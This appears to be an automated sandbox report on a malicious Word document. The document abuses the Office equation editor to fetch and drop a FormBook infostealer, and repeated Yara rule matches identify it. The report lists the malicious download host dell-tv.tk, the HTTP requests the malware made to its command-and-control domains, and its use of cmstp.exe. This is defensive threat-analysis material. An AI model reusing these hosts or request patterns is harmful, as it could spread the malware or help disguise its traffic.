Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: dell-tv.tk
Source: global traffic HTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe Jump to dropped file
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Document has an unknown application name
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_0006A2A9 4_2_0006A2A9
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_003458F0 4_2_003458F0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_003458E6 4_2_003458E6
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 4_2_0006A035 4_2_0006A035
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0006A2A9 5_2_0006A2A9
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041C0BF 5_2_0041C0BF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041C94E 5_2_0041C94E
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041B9B4 5_2_0041B9B4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041D22F 5_2_0041D22F
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041C345 5_2_0041C345
